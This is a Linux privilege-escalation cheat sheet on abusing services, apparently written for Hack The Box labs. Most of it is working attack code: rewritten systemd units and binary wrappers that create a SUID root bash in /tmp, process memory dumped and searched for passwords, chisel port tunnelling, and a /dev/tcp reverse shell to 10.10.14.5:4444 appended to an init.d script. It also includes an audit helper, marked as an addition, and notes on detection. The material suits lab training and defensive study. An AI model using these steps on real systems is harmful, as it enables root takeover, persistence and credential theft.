Service and Process Abuse
# Overview
System services (systemd, init.d scripts) running as root can be exploited if their configuration files or binaries are writable by a low-privilege user. Additionally, internal services listening only on localhost can be accessed through port forwarding and exploited. Process memory of privileged services may contain credentials that can be dumped.
# Prerequisites
- User-level shell access
- Write access to service configuration files or service binaries
- For internal services: ability to create port forwarding or interact with localhost
# Detection & Enumeration
```bash
# List running services
systemctl list-units --type=service --state=running
service --status-all 2>/dev/null
# Find writable systemd service files
find /etc/systemd/system/ -writable -type f 2>/dev/null
find /lib/systemd/system/ -writable -type f 2>/dev/null
find /usr/lib/systemd/system/ -writable -type f 2>/dev/null
# Find writable init.d scripts
ls -la /etc/init.d/
find /etc/init.d/ -writable -type f 2>/dev/null
# Find services running as root
ps aux | grep root
# Find internal services (listening only on 127.0.0.1/localhost)
ss -tlnp | grep 127.0.0.1
netstat -tlnp | grep 127.0.0.1
```
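The following audit helper is an added example, not code from the original page: it automates the two checks above (writable unit files, and Exec* targets a low-privilege user could replace) over the standard unit directories, and also flags a target whose parent directory is writable. Function names, the `WRITABLE_UNIT`/`WRITABLE_EXEC` output labels and the directory list are this example's own assumptions.

```bash
#!/usr/bin/env bash
# Added audit helper (not from the original page). Run it as the
# low-privilege account being assessed; findings are printed one per line.

# Print every .service file under the given directory that the current user can write.
find_writable_units() {
  find "$1" -type f -name '*.service' -writable 2>/dev/null
}

# Print the executable path of each Exec* line in a unit file, after
# stripping systemd's special prefix characters (-, @, +, !, :).
exec_paths() {
  grep -E '^Exec(Start|StartPre|StartPost|Reload|Stop|StopPost)=' "$1" \
    | sed -E 's/^Exec[A-Za-z]+=[-@+!:]*//' \
    | awk 'NF { print $1 }'
}

# Print "unit:path" for each Exec* target that the current user can write,
# or whose parent directory the current user can write (replace/rename surface).
writable_exec_targets() {
  local unit="$1"
  exec_paths "$unit" | while IFS= read -r p; do
    case "$p" in /*) ;; *) continue ;; esac   # only absolute paths are meaningful
    if [ -w "$p" ] || [ -w "$(dirname "$p")" ]; then
      echo "$unit:$p"
    fi
  done
}

# Audit one or more unit directories. Prints findings and returns 1 if any were found.
# (Unit paths are word-split; systemd unit file names do not contain spaces.)
audit_unit_dirs() {
  local found=0 dir unit
  for dir in "$@"; do
    [ -d "$dir" ] || continue
    for unit in $(find "$dir" -type f -name '*.service' 2>/dev/null); do
      [ -w "$unit" ] && { echo "WRITABLE_UNIT $unit"; found=1; }
      writable_exec_targets "$unit" | sed 's/^/WRITABLE_EXEC /' | grep . && found=1
    done
  done
  return $found
}

# Typical invocation over the directories enumerated above:
#   audit_unit_dirs /etc/systemd/system /lib/systemd/system /usr/lib/systemd/system
```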
# Exploitation / Execution
## Writable Systemd Service Files
```bash
# If a systemd service file is writable:
cat > /etc/systemd/system/vulnerable.service << 'EOF'
[Unit]
Description=Vulnerable Service
[Service]
Type=simple
ExecStart=/bin/bash -c "cp /bin/bash /tmp/rootbash; chmod 4755 /tmp/rootbash"
Restart=no
[Install]
WantedBy=multi-user.target
EOF
# Reload and restart
systemctl daemon-reload
systemctl restart vulnerable.service
# Or if you can't restart, wait for reboot
/tmp/rootbash -p
```
## Restart-Triggered Exploits
When a service runs periodically or on a trigger:
```bash
# If you can modify a service that restarts on failure or timer:
# Add a malicious ExecStartPre to an existing service
grep -r "ExecStart" /etc/systemd/system/ 2>/dev/null
# If you find a writable file, add:
# ExecStartPre=/bin/bash -c "cp /bin/bash /tmp/rootbash; chmod 4755 /tmp/rootbash"
```
## Internal Services on Localhost
```bash
# Port forward to access internal services
# From attacker machine, use SSH local forwarding:
ssh -L 8080:127.0.0.1:8080 user@target.htb
# Now access http://localhost:8080 from attacker browser
# Or use chisel on the target:
./chisel client 10.10.14.5:6666 R:8888:127.0.0.1:8080
# Common internal services to enumerate:
# - Databases: 3306 (MySQL), 5432 (PostgreSQL), 27017 (MongoDB), 6379 (Redis)
# - Web apps: 8080, 8443, 3000, 5000, 8000
# - Management: 9090, 10000
```
## Process Memory Dumping
```bash
# Check /proc for readable memory of privileged processes
# Find a root process (requires ptrace capability or same user);
# grep -v "]" drops kernel threads, whose names are shown in brackets
ps aux | grep root | grep -v "]"
# If you can read /proc/<PID>/mem:
# Dump process memory for credential extraction
cat /proc/<PID>/maps
# maps shows hex address ranges; dd's skip= and count= take decimal byte values
dd if=/proc/<PID>/mem of=/tmp/proc_dump bs=1 skip=<start> count=<length>
strings /tmp/proc_dump | grep -i password
# gdb (requires ptrace capability)
gdb -p <PID>
(gdb) info proc mappings
(gdb) dump memory /tmp/dump 0x<start> 0x<end>
```
## Writable init.d Scripts
```bash
# Find writable init scripts
find /etc/init.d/ -writable -type f 2>/dev/null
# Modify the script to spawn a reverse shell
echo '#!/bin/bash
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1' >> /etc/init.d/writable_service
# Restart the service (if you have permission)
/etc/init.d/writable_service restart
# Or wait for reboot / manual restart by admin
```
## Service Binary Replacement
```bash
# If a service binary is writable:
ls -la /usr/local/bin/some_service
# If writable, replace it:
cp /usr/local/bin/some_service /usr/local/bin/some_service.bak
echo '#!/bin/bash
cp /bin/bash /tmp/rootbash; chmod 4755 /tmp/rootbash
exec /usr/local/bin/some_service.bak "$@"' > /usr/local/bin/some_service
chmod +x /usr/local/bin/some_service
# When service restarts, the wrapper runs, creates SUID bash, then executes the original
/tmp/rootbash -p
```
# Common Pitfalls
- systemctl daemon-reload requires privileges to run -- check with sudo -l or use a writable timer that reloads automatically
- Service restart may require sudo; check sudo -l for service management commands
- Internal services may require authentication (databases, web apps) -- enumerate credentials first
- Process memory dumping may require ptrace capability or same UID
- Service modifications may be reverted by config management (Ansible, Puppet, Chef)
- Some systemd units have ProtectSystem=full or ReadOnlyPaths= set, preventing modification
# OPSEC Considerations
- Modifying systemd service files is a high-severity action and is logged by auditd and systemd-journald.
- Service restart events are logged and may trigger monitoring alerts.
- Creating SUID binaries in /tmp is easily detected by file integrity monitoring.
- Port forwarding to internal services may trigger network monitoring alerts.
- Process memory dumping via ptrace is logged by the kernel audit subsystem.
# Post-Exploitation Value
Service modification provides: persistent root access that survives reboots, credential extraction from privileged process memory, access to internal-only services and databases, and lateral movement to adjacent systems through the service's network access.
# Cross-References
## Tool References
| Tool | Link |
|---|---|
| pspy | https://github.com/DominicBreuker/pspy |
| gdb | apt install gdb |
## Source Machines
- Sau (Easy, Linux) - systemctl service + pager escape to root
- Monitored (Medium, Linux) - Service command injection + symlink following for SSH key extraction